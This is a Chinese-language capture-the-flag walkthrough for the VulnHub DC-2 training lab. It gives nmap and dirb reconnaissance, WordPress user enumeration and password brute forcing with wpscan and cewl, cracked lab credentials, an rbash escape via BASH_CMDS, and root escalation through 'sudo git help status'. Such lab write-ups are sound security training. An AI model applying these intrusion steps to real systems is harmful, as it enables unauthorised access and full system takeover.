- 环境搭建:
与DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。与最初的DC-1一样,它是为初学者设计的。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。就像DC-1一样,有五面旗帜,包括最后一面旗帜。和DC-1一样,旗子对初学者来说很重要,但对有经验的人来说就不那么重要了。简而言之,唯一真正有意义的旗帜,是最后一面旗帜。对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等。我没有探索实现root的所有方法,因为我放弃了我一直在研究的上一个版本,并从基本操作系统安装中完全重新开始,和DC-1一样,有五个flag
2,靶场下载环境为:https://www.vulnhub.com/entry/dc-2,311/
二,渗透靶场
1,攻击目标:就是我们搭建的dc靶场,靶场IP为:XXX.XXX.XXX.XXX/24
2、信息收集:寻找靶机真实IP(自己虚拟机的IP)
命令:nmap -sP 192.168.0.10
3,信息收集:探寻端口和服务
命令:nmap -A -p- -v 192.168.0.11
发现开放了80端口,存在web服务,Apache/2.4.10,
发现开放了7744端口,开放了ssh服务,OpenSSH 6.7p1
4,接下来访问web站点
发现页面访问不了,我们需要修改hosts文件,添加一个IP域名指向
5,修改hosts文件
命令:vim /etc/hosts
添加成功后再去访问即可成功
三,发现flag1
这些大概意思是:你通常的单词列表可能不起作用,所以,也许你只是得小心点。
更多的密码总是更好,但有时你就是赢不了他们都是。
以一个身份登录,以查看下一个标志。
如果你找不到它,就以另一种身份登录,就是暴力破解账号,密码
四,目录扫描
命令:dirb http://dc-2/
发现有个像后台地址,在火狐页面登录,但是没什么可以用的东西图一乐就行
五,用户名枚举
Wpscan一些常用语句:
wpscan --url http://dc-2
wpscan --url http://dc-2 --enumerate t 扫描主题
wpscan --url http://dc-2 --enumerate p 扫描插件
wpscan --url http://dc-2 --enumerate u 枚举用户
1,扫描一下WordPress版本
命令:wpscan --url http://dc-2
然后发现了WordPress4.7.10版本
2,在登录页面登录一下,输入账号和密码,但是提示不存在此用户,可以用用户枚举
六,先用个用户枚举,尝试得到用户爆破密码
命令:wpscan --url http://dc-2 --enumerate u
枚举出了三个:admin jerry tom
七,使用暴力破解出账号和密码
命令:cewl http://dc-2/ -w dc2..txt
1,使用wpscan进行暴力破解
命令:wpscan --url http://dc-2 --passwords dc2.txt
看到爆破出了两个账号
2,jerry/adipiscing tom/parturient使用这两个登录站点
jerry/adipiscing登录页面
tom/parturient登录页面
八,发现flag2
登录后看到flag2,我用的Jerry账号登录的
点开flag2看到提示信息,如果WordPress不行的话我们可以看看ssh
意思就是:
如果你不能利用WordPress并采取一条捷径,还有另外一种方法,希望你找到了另一个入口
九,在tom的家目录发现flag3
1.先登录ssh
命令;ssh tom@192.168.0.11 -p 7744
然后发现了flag3
2,我们发现了 less和vi可以来查看,内容显示如下
3,然后使用rbash绕过详情参考:https://xz.aliyun.com/t/7642
命令;echo $PATH,使用cd加目录进不去,使用ls直接查看目录内的信息
4,使用命令绕过rbash:
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
echo /*
十,1.在Jerry家目录发现了flag4
2,然后输入命令:cat flag4.txt
大概意思:
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
很高兴看到你走了这么远,但你还没回家,您仍然需要获得最后的标志(唯一真正重要的标志,这里没有暗示,你现在只能靠自己了,继续,猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权
3,我们使用tom来运行sudo,切换到Jerry用户
命令:sudo -l
十一,提权
1,查看可以使用的root权限命令
命令:find / -user root -perm -4000 -print 2>/dev/null
2,Jerry用户不可直接使用sudo su
使用git进行提取
命令:sudo git help status
这样提权成功
十二,发现final-flag。txt
命令:cd /root
cat final-flag.txt
恭喜贺喜宝子们通过了哈哈哈,太厉害了